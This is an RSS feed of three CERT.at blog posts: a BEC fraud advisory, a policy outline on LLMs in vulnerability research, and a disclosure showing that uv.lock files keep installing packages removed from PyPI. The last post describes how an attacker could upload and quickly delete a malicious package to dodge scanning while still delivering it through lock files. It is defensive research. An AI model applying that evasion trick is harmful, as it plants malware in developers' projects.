<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0"><channel><title>CERT.at - Blog</title><link>https://www.cert.at</link><description>This feed contains the blog from www.CERT.at</description><item><title>Increased fraud attempts through BEC</title><link>https://www.cert.at/en/blog/2026/8/increased-fraud-attempts-through-bec</link><description>&lt;p class=&quot;block&quot;&gt;In recent weeks, we have been receiving an increasing number of reports about criminals targeting Austrian organizations through Business Email Compromise (BEC).&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;In this type of fraud, criminals impersonate a trusted person (such as management, a known supplier, a colleague from the HR department, ...) in order to get employees to carry out bank transfers, change payment or bank details, or hand over sensitive information.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;BEC is not a single, uniform type of attack, but rather a &quot;family&quot; of scenarios that all rely on identity deception. Some examples:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Impersonation of management&lt;/strong&gt;: Attackers pose as a senior executive and write to the finance or accounting department with a supposedly urgent, confidential request for a transfer. This is to be carried out as quickly as possible and, above all, without the knowledge of other members of the organization.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Invoice fraud&lt;/strong&gt;: Attackers pose as a supplier or service provider of an organization (sometimes even using the original mail accounts of a legitimate company that was previously compromised by the criminals) and send an &quot;updated&quot; invoice or a notice that the supplier's bank details have changed, in order to redirect a legitimate, expected payment to an account controlled by the criminals.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Hijacking of an email thread&lt;/strong&gt;: Attackers gain access to an email mailbox (for example, via credentials compromised by an infostealer or through a vulnerability in a web interface), covertly observe a conversation surrounding a real invoice or an actual business transaction, and subsequently inject false payment instructions into that conversation, which makes the request appear authentic.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Data theft&lt;/strong&gt;: Instead of (or in addition to) a monetary transaction, the attackers pose as an executive and ask the HR department for sensitive information such as payroll tax statements or employees' personal data. This data is then subsequently misused for identity theft and / or further fraudulent acts.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;What distinguishes this type of attack from others is the low technical effort involved. In most cases, the attackers' main tool is a credible story and at least a rudimentary understanding of how communication normally works within companies and how the approval of financial transactions typically proceeds.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;By exploiting organizational trust and internal processes in this way, this form of fraud bypasses many of the common technical protective measures that companies and organizations rely on for defense against other forms of cybercrime.&lt;/p&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Detection&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Although perpetrators act rather skillfully by now, there are certain characteristics within messages that indicate a fraud attempt is underway.&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Feigned urgency&lt;/strong&gt;, often combined with a request for secrecy: Perpetrators try to induce stress in order to weaken the victims' vigilance - for example, by demanding that a transfer be carried out immediately and that no one be told about it, often under threat of consequences for the victim.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Circumvention of normal approval processes&lt;/strong&gt;: The perpetrators push to skip normal approval processes or at least to speed them up. Sometimes criminals have an intimate understanding of the targeted organization and demand amounts that fall below an internal approval threshold.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Unavailability of the &quot;responsible person&quot;&lt;/strong&gt;: In their messages, the criminals claim that the person they are impersonating cannot be reached by phone, citing various reasons, so that communication takes place exclusively via digital mail.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Sudden changes&lt;/strong&gt;: An unexpected, unsolicited change to the bank or payment details of a known supplier, service provider, or employee is a very clear warning sign. The same applies to a sudden change in writing style within an existing email conversation.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;There are also indicators on a technical level that represent grounds for suspecting a fraud attempt:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Domain changes&lt;/strong&gt;: A sender domain or reply-to domain that is almost, but not quite, correct (e.g. a swapped letter, an additional hyphen, a different TLD, ..)&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Irregularities in the email address&lt;/strong&gt;: The display name in the email client is correct, but when checking the full headers, the actual email address does not match.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Fake forwarding&lt;/strong&gt;: An apparently forwarded email conversation that, upon inspection of the headers, actually originates from an external domain rather than from the organization's own mail system.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Unusual logins&lt;/strong&gt;: Logins from a new device, a new country, or from an unknown IP-address, or an unexpected password reset on an account (especially shortly before a payment instruction), are strong indicators of illegitimate activity.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h1 class=&quot;block&quot;&gt;Countermeasures&lt;/h1&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Unlike many other types of attacks, protective measures against BEC are primarily situated at the policy level:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Well-documented, fixed, non-negotiable procedures&lt;/strong&gt; should exist for financial transactions and changes to data of service providers and suppliers. It's particularly important that employees are aware that these procedures must not be overridden by supposed urgency, hierarchy, and / or demands for confidentiality.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Every request to change payment / bank details or every urgent transfer request should be &lt;strong&gt;verified by phone using an already known, stored number&lt;/strong&gt; - and never using a number provided within an &quot;instructing&quot; email itself.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;The &lt;strong&gt;four-eyes principle&lt;/strong&gt; should apply to financial transactions, whereby one person may never both approve and execute a transfer.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Awareness training should&lt;/strong&gt; explicitly address the topic of BEC, since the approach here is entirely different from &quot;classic&quot; phishing emails.&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Nevertheless, there are also measures at the technical level that, while generally advisable and valid on their own, make this type of fraud particularly difficult:&lt;/p&gt;&#13;
&lt;ul&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Wherever technically and organizationally feasible, &lt;strong&gt;enforce modern multi-factor authentication (MFA) for all email and remote access accounts&lt;/strong&gt;. Exceptions to these authentication measures should be viewed as highly critical within the organization's own risk management and should be avoided as much as possible.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;Apply &lt;strong&gt;conditional access policies&lt;/strong&gt; (blocking access in the case of unusual geographic origin / unusual device) and set up corresponding alerting.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Implement SPF, SKIM, and DMARC&lt;/strong&gt; and enforce them accordingly, with DMARC set to &quot;reject&quot; for your own organization's domains.&lt;/li&gt;&#13;
&lt;li class=&quot;block&quot;&gt;&lt;strong&gt;Restrict and log the creation of automatic forwarding rules&lt;/strong&gt;, and block forwarding to external domains via policy.&lt;/li&gt;&#13;
&lt;/ul&gt;</description><pubDate>Tue, 25 Aug 2026 21:04:49 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2026/8/increased-fraud-attempts-through-bec</guid><dc:creator>CERT.at</dc:creator><dc:date>2026-08-25T21:04:49Z</dc:date></item><item><title>On the cyber-security implications of current LLMs</title><link>https://www.cert.at/en/blog/2026/6/on-the-cyber-security-implications-of-current-llms</link><description>&lt;p class=&quot;block&quot;&gt;The rapid progress in the capabilities of LLMs for cyber-security related tasks naturally leads to the question of what the right response should be. With regards to CISOs, this (German) &lt;a href=&quot;https://www.cert.at/de/aktuelles/2026/4/llm-basierte-schwachstellensuche&quot;&gt;article on our webpage&lt;/a&gt; is my summary which also links to the &lt;a href=&quot;https://labs.cloudsecurityalliance.org/mythos-ciso/&quot;&gt;paper from the Cloud Security Alliance&lt;/a&gt; .&lt;/p&gt;&#13;
&lt;p&gt;Naturally, also the policy layer has woken up, and &amp;ndash; as is their usual response &amp;ndash; &lt;strong&gt;something needs to be done&lt;/strong&gt;. (Or more precisely: we need to be seen doing something.) What exactly the EU or national politicians should do to steer the current developments in the right direction is still an open question. Some proposals are bubbling up in various forums, and some are &lt;a href=&quot;https://codeberg.org/tzafaar/Buffers_overflow_into_policy/src/branch/main&quot;&gt;formulated openly&lt;/a&gt;.&lt;/p&gt;&#13;
&lt;p&gt;One of the documents I&amp;rsquo;ve been asked to comment on triggered my inner Monk. The structure wasn&amp;rsquo;t consistent so I started to sketch out how I would approach the problem. The issue is that the LLMs change multiple different things, and unless you are careful not to mix these up, the policy response will be a confused mess.&lt;/p&gt;&#13;
&lt;p&gt;So, here is a rough outline of how I structure the problem set in my mind. It&amp;rsquo;s not a complete treatment of all the points, just a scaffolding that needs to be fleshed out. Nevertheless, I think it could provide some value.&lt;/p&gt;&#13;
&lt;h2&gt;What has happened?&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Models are improving, 2025 -&amp;gt; 2026 was a significant step&lt;/li&gt;&#13;
&lt;li&gt;It&amp;rsquo;s not just Anthropic, other frontier models are at a similar level&lt;/li&gt;&#13;
&lt;li&gt;Mythos was a genius PR stunt to prepare for the IPO of Anthropic&lt;/li&gt;&#13;
&lt;li&gt;Open weight models are a bit behind but are already pretty good and will reach the level of Mythos in a few months&lt;/li&gt;&#13;
&lt;li&gt;Research in this area is intensive and happening all over the world. Further progress is likely to be rapid and significant&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2&gt;What can these models do now?&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;vulnerability research on software&lt;/li&gt;&#13;
&lt;li&gt;assist in patch development&lt;/li&gt;&#13;
&lt;li&gt;automated penetration testing&lt;/li&gt;&#13;
&lt;li&gt;patch reverse engineering: finding exploits for vulnerabilities which just got fixed&lt;/li&gt;&#13;
&lt;li&gt;targeted search for vulnerabilities based on published advisories&lt;/li&gt;&#13;
&lt;li&gt;chaining of vulnerabilities to create complex exploit code&lt;/li&gt;&#13;
&lt;li&gt;AI-Assisted or fully agentic kill-chains can execute very quickly&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2&gt;What is the impact?&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;The rate of new vulnerabilities findings has increased significantly&#13;
&lt;ul&gt;&#13;
&lt;li&gt;strain on the resources to deal with them (triage, patch-dev, testing, publication, rollout)&lt;/li&gt;&#13;
&lt;li&gt;that hits: vendors, Open-Source maintainers, CSIRTs, customers, users&lt;/li&gt;&#13;
&lt;li&gt;we don't know yet if this is a one-time wave, or a permanent increase in the rate of vuln-findings&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;Duplicate findings are increasing&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Open-Source maintainers stop treating reports confidentially&lt;/li&gt;&#13;
&lt;li&gt;The CVD secrecy time-window is collapsing&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;Once a vulnerability is disclosed/patched, exploit code will be developed very quickly&#13;
&lt;ul&gt;&#13;
&lt;li&gt;the window for planned patching (testing, rollout, ...) is shrinking&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;Chaining of vulns can create a highly relevant meta-vuln out of multiple low-rated vulns&#13;
&lt;ul&gt;&#13;
&lt;li&gt;low-CVSS vulns cannot be ignored&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;Legacy / un-maintained software becomes a critical risk&#13;
&lt;ul&gt;&#13;
&lt;li&gt;if fully supported code struggles with keeping up, old codebases without active maintenance just cannot&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;Quicker kill-chain execution puts very strong pressure on the reaction-times of defenders&#13;
&lt;ul&gt;&#13;
&lt;li&gt;SOC speed for detection must improve&lt;/li&gt;&#13;
&lt;li&gt;Can humans react quickly enough?&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;h2&gt;What should be done?&lt;/h2&gt;&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Vendors&#13;
&lt;ul&gt;&#13;
&lt;li&gt;get ahead of the curve: use LLMs in the QA process&lt;/li&gt;&#13;
&lt;li&gt;be sure to have enough manpower to deal with the wave&lt;/li&gt;&#13;
&lt;li&gt;CVD processes need to become faster&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;CSIRTs&#13;
&lt;ul&gt;&#13;
&lt;li&gt;revisit the advisory process, can we continue with the current scheme?&lt;/li&gt;&#13;
&lt;li&gt;Should LLM-based pen-testing be part of the portfolio of CSIRTs?&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;Critical Infrastructure&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Security basics become even more important (e.g. reduce attack surface)&lt;/li&gt;&#13;
&lt;li&gt;improve detection and automated response (SOAR)&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;li&gt;EU Policy&#13;
&lt;ul&gt;&#13;
&lt;li&gt;Trying to regulate these models is a fool's game, the cat is out of the bag&lt;/li&gt;&#13;
&lt;li&gt;A &quot;we need to build datacentres for AI in Europe&quot;-response is also likely to be wrong - unless built in a 100% renewable energy&amp;nbsp; and cooling setting&lt;/li&gt;&#13;
&lt;li&gt;Check what others are doing. E.g., &lt;a href=&quot;https://www.imda.gov.sg/about-imda/emerging-technologies-and-research/artificial-intelligence#Model-AI-Governance-Framework-for-Agentic-AI&quot;&gt;Singapore on Agentic AI&lt;/a&gt;, &lt;a href=&quot;https://www.aisi.gov.uk/&quot;&gt;UK funding a Research Institue&lt;/a&gt;, ...&lt;/li&gt;&#13;
&lt;li&gt;Check how the &quot;best current security practices&quot; are changing due to LLMs, make sure security mandates are updated&lt;/li&gt;&#13;
&lt;li&gt;Check if NIS2 CVD, CRA vuln handling, and ENISA's CVD processes are capable of handling the current wave&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;/li&gt;&#13;
&lt;/ul&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I might be updating this list over the next weeks.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;Should we start a betting pool on what ideas the EU will come up with?&lt;/p&gt;</description><pubDate>Mon, 01 Jun 2026 14:21:06 GMT+0100</pubDate><guid>https://www.cert.at/en/blog/2026/6/on-the-cyber-security-implications-of-current-llms</guid><dc:creator>CERT.at</dc:creator><dc:date>2026-06-01T14:21:06Z</dc:date></item><item><title>Lock the Ghost</title><link>https://www.cert.at/en/blog/2026/3/lock-the-ghost</link><description>&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;&lt;strong&gt;In the software&amp;nbsp; world, &amp;ldquo;remove&amp;rdquo; is not equal to &quot;gone.&quot; This is crystal clear. There is always a good reason for that, but even the best reason does not have to be intuitive or expected by the users. Let&amp;rsquo;s take a short trip through how Python Package Index handles removals and how we can lock the ghost in an uv.lock file &amp;ndash; forever!&lt;/strong&gt;&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;PyPI Package Lifecycle&lt;strong&gt;&lt;br /&gt;&lt;/strong&gt;&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Historically, package lifecycle in PyPI was a binary state: the package existed or not. This was later extended when the &amp;ldquo;quarantine&amp;rdquo; status was introduced [1] to temporarily block resolving packages during security investigations. Here it is also important to mention that when a package is removed by PyPI administration after deeming it malicious, the project name is routinely blocked from being reclaimed. This is not the case for packages removed by their owners, and it leads to a threat of taking over the name of a removed package, described by JFrog [3]. Package owners can now prevent this by archiving a project instead of removing it [4].&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This organic growth of the package lifecycle was finally deeply discussed and formalized last year in PEP 792 [5], resulting in four package status markers: active, archived, quarantined, and deprecated [6], in addition to the package removal. Moreover, one can also play with the specific releases, which could be removed or yanked (&amp;ldquo;soft&amp;rdquo; removal intended for not breaking pinned versions [7]).&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Locking dependencies&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Managing dependencies is always a cry-triggering topic. The holy grail is achieving reproducible environments and builds. The classic Python approach is a simple lock file with just version pinning, represented by pip-tools [8], which could also be used in integrity-checking mode with hash validation. The step forward is more complex lock files, probably best known from the NPM world. Such a file extends standard version pinning with additional information, including hashes, filenames, and machine-readable dependency trees. They solve many problems but also introduce new issues. Who reviews all the automated package-lock.json changes [9]?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;In Python, we have at least four manager-specific implementations: uv.lock, Pipfile.lock, poetry.lock, pdm.lock. Last year&amp;nbsp; also brought an official pylock.toml [10].&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The Ghost and the uv.lock File&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Now, let&amp;rsquo;s do an experiment. I created a package in the test.pypi.org and added it as a dependency to a project using uv. Thereafter, the uv.lock file was generated, and the package was removed from the index. Finally, I attempted to install the project in a fresh virtualenv. How it went:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20260310-lock-the-ghost/commands.png&quot; width=&quot;900&quot; height=&quot;426&quot; /&gt;&lt;br /&gt;&lt;em&gt;Commands executed after removing the dependency package. Note that the additional index URL was declared in the pyproject.toml.&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;And to confirm:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;em&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20260310-lock-the-ghost/ghost.png&quot; width=&quot;750&quot; height=&quot;713&quot; /&gt;&lt;/em&gt;&lt;br /&gt;&lt;em&gt;We found the ghost!&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;As you can see, at first &lt;strong&gt;&lt;span style=&quot;color: #993300;&quot;&gt;(1)&lt;/span&gt;&lt;/strong&gt;, uv was unable to install the dependencies using the standard pip-compatible interface &amp;ndash; obvious, as the package didn&amp;rsquo;t exist at all. But uv did not complain once I used the &amp;ldquo;uv sync&amp;rdquo; command, leveraging the lock file &lt;span style=&quot;color: #993300;&quot;&gt;&lt;strong&gt;(2)&lt;/strong&gt;&lt;/span&gt; and successfully installed the &amp;ldquo;ghost&amp;rdquo; package. In both cases, uv was instructed not to use local cache. As such, we got the dependency installed &amp;ndash; the dependency that has already been removed from the upstream index!&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;How is it possible?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;If you look at the uv.lock, you will see something like this:&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20260310-lock-the-ghost/uvlock.png&quot; alt=&quot;&quot; width=&quot;900&quot; height=&quot;421&quot; /&gt;&lt;br /&gt;&lt;em&gt;The uv.lock used in the demonstration&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;If you look closely, you could see in lines 20 and 22 URLs directly to the dependency distribution files. They actually contain the package code. The philosophy behind uv is to be an extremely fast package manager. In this spirit, the uv.lock file contains everything needed to download and install dependencies without having to consult the index API anymore.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;But I removed the package, didn&amp;rsquo;t I? Well, I did, and it means the package is gone from the index. You can no longer see anything under https://test.pypi.org/project/the-ghost/&amp;nbsp; However, PyPI does not remove the underlying distribution files. And if you have the link, you can still access it &amp;ndash; and so did uv in this example!&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I tested this behavior on four different Python package managers supporting lock files. Only uv stores the direct URLs and omits querying the index during installation. My experiment&amp;rsquo;s code is available in a repository [11].&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;The Malicious Ghost&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;In most cases, this behavior does not need to be a big problem (it even may be a bit helpful). However, consider the malicious packages, for example, used in the North Korean fake recruitment tasks, which are often GitHub repositories with projects referencing malicious dependencies from NPM or PyPI [12]. Such packages could be quickly removed from PyPI, but the related GitHub repositories are not always identified. If the threat actor uses different Git hosting, the situation is even more complex, as they tend to have limited code search functionality. If the malicious repository uses uv.lock to pin dependencies, the malicious code stays active even after the removal from the PyPI!&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Moreover, we all still have the xz story in mind [13]. One of the reasons it almost succeeded was hiding malicious code parts in the test binary files. No one can effectively review binary files in every change, and so it is with all lock files as well: they are big, auto-generated, and even hidden in the review flow of git services like GitHub or GitLab. What keeps you from including only there a malicious dependency? This scenario was described by Snyk a few years ago in the NPM example [9]. Now, given that PyPI leaves the distribution files behind, you can try a trick: upload and immediately remove the package from the registry, before the security vendors even notice its existence. This way, you can significantly slow down the detection by avoiding the automatic analysis. And the uv.lock still lets you install the malicious dependency. If you use a different manager, just point it to the file URL directly &amp;ndash; a bit more suspicious to see, but still easy to miss in review.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;This is not an entirely theoretical scenario; I do have examples of Python packages put in the PyPI&amp;rsquo;s quarantine so quickly that some good vendors haven't noticed they ever existed.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Versions are not idempotent in PyPI&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot;&gt;...but distribution files are.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;There is also one more interesting edge case related to removing packages from PyPI. As I already mentioned, if the package was removed, the name could be reused by another user. So was the case of &amp;ldquo;umap&amp;rdquo;, which was removed by the original author and later taken over with a name hijack attempt [14]. Such a scenario was already covered by JFrog [3]. The weird thing? The new owner uploaded the package with the same version number as the previous one. How?&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;A Python package can have multiple distribution files, e.g. with the native module compiled for different architectures or Python versions. The most typical case is to have a source distribution and a &amp;ldquo;compiled&amp;rdquo; wheel distribution. In the case of umap, the original author uploaded only the source distribution. The safeguards PyPI has in place do not allow uploading the same distribution type again (based on strictly defined filename), but you can always upload another type &amp;ndash; even if the package belongs now to another user.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;In the context of our lock files, let&amp;rsquo;s note that in such a case, they can help you stay secure by keeping the old distribution file &amp;ndash; but only until you regenerate the lock.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Make it gone?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;So, what if we just decided that &quot;removed&amp;rdquo; means &amp;ldquo;gone&amp;rdquo;, and started clearing distribution files when deleting a package? It&amp;rsquo;s already removed, right? Well, the world isn&amp;rsquo;t so easy. Just the concept of removing anything from a package registry has its opponents, and not without reasons. Open-source community is an interconnected network, where you never know who depends on you. NPM limited package removal possibilities after the case of the left-pad package, which was removed by the author, causing enormous downstream issues [17]. The PyPI has its case of atomicwrites [18], which triggered a long discussion [19], but up to now, there is no conclusion on the eventual policy change.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I actually don&amp;rsquo;t have a strong opinion on allowing or not removals in general.&amp;nbsp;However, I believe that objects removed for security reasons, like compromised releases or malicious packages, should not be accessible through the previous delivery channels to prevent spreading the malware to unaware users. Such malicious code could&amp;nbsp; still be available for research purposes, just in another place and with at least a simple protection against accidental downloading and executing.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Do ghost packages really exist?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I tried to verify if such &amp;ldquo;ghost packages&amp;rdquo; exist and someone really downloads removed distributions. PyPI publishes a lot of analytics data as BigQuery datasets, but unfortunately not enough to clearly state if (and when) the package was removed. As such, I used the &amp;ldquo;umap&amp;rdquo; example.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;In the table below, you can see downloads of the last legitimate umap version after 1st January 2026. At this time this distribution was &amp;ldquo;removed&amp;rdquo; for about two months. Still, it was downloaded more than 1000 times, mainly by &amp;ldquo;uv sync&amp;rdquo; &amp;ndash; the lock file installation command from uv.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: center;&quot;&gt;&lt;img src=&quot;https://www.cert.at/media/files/news/blog/20260310-lock-the-ghost/umap-stats.png&quot; alt=&quot;Most downloaded umap distribution files after 2026-01-01 &quot; width=&quot;900&quot; height=&quot;179&quot; /&gt;&lt;br /&gt;&lt;em&gt;Most downloaded umap distribution files after 2026-01-01&amp;nbsp;&lt;/em&gt;&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;It&amp;rsquo;s worth mentioning that in this case, the availability of the removed distribution surely helped the developers keep their projects working. On the other hand, silent dependency on the removed package makes them more vulnerable to the name hijacking &amp;ndash; as it was in this case. If a developer regenerated the lock file while the package was controlled by an attacker, they could lock the malicious file.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot;&gt;I checked a few more packages I know to be removed. In most cases, the dataset shows a few downloads from tools identified as &amp;ldquo;Browser&amp;rdquo; or mirroring utilities. I suspect the scale of ghost packages in real projects is not big, but a more in-depth investigation would be required to verify this.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot;&gt;Lawyers enter the room&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I have a strange habit of reading legal documents, so I did look into&amp;nbsp;PyPI&amp;rsquo;s Terms of Service. They have two interesting points related to removing content. First, you obviously grant the Python Software Foundation some rights to distribute what you upload. However [15]:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Because you retain&amp;nbsp;ownership of and responsibility for Your Content, we need you to grant us &amp;mdash; and other PyPI Users &amp;mdash; certain legal permissions, provide in subections 4 &amp;mdash; 6 below. These license grants apply to Your Content. If you upload Content that already comes with a license granting PSF the permissions we need to run our Service, no additional license is required. You understand that you will not receive any payment for any of the rights granted in subsections 4 &amp;mdash; 6 below. The licenses you grant to us will end when you remove Your Content from our servers.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot;&gt;And further, we can also find a fragment about deleting an account [16]:&lt;/p&gt;&#13;
&lt;blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;We will retain and use your information as necessary to comply with our legal obligations, resolve disputes, and enforce our agreements, but barring legal requirements, we will delete your full profile and the Content of your Project(s) and/or Organizations immediately upon cancellation or termination (though some information may remain in encrypted backups). This information can not be recovered once your Account is canceled. Activity logs reflecting user actions taken on Projects and Organizations are retained as long as reasonably required.&lt;/p&gt;&#13;
&lt;/blockquote&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;I&amp;rsquo;m not a lawyer, and I see plenty of edge cases. As a PyPI user, I feel the theory and practice could be a bit misaligned. I notified PSF about my doubts, and they are analyzing the situation.&lt;/p&gt;&#13;
&lt;h2 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;How should I live?&lt;/h2&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;To sum up, I presented that removed packages could still be reached from the PyPI infrastructure, and using uv.lock files can be used to hide malicious packages surviving removal from the index. Permanent existence of removed releases may have some advantages, but it&amp;rsquo;s not the most intuitive policy. I did not check how other package indexes behave.&lt;/p&gt;&#13;
&lt;p class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;Regardless of the ecosystem, if you leverage lock files in your projects, be sure that your dependency security scanning covers them and not just the initial dependency declaration. If you wonder what to do when installing an untrusted project from GitHub or similar services, the answer is simple: don&amp;rsquo;t.&lt;/p&gt;&#13;
&lt;h3 class=&quot;block&quot; style=&quot;text-align: justify;&quot;&gt;References&lt;/h3&gt;&#13;
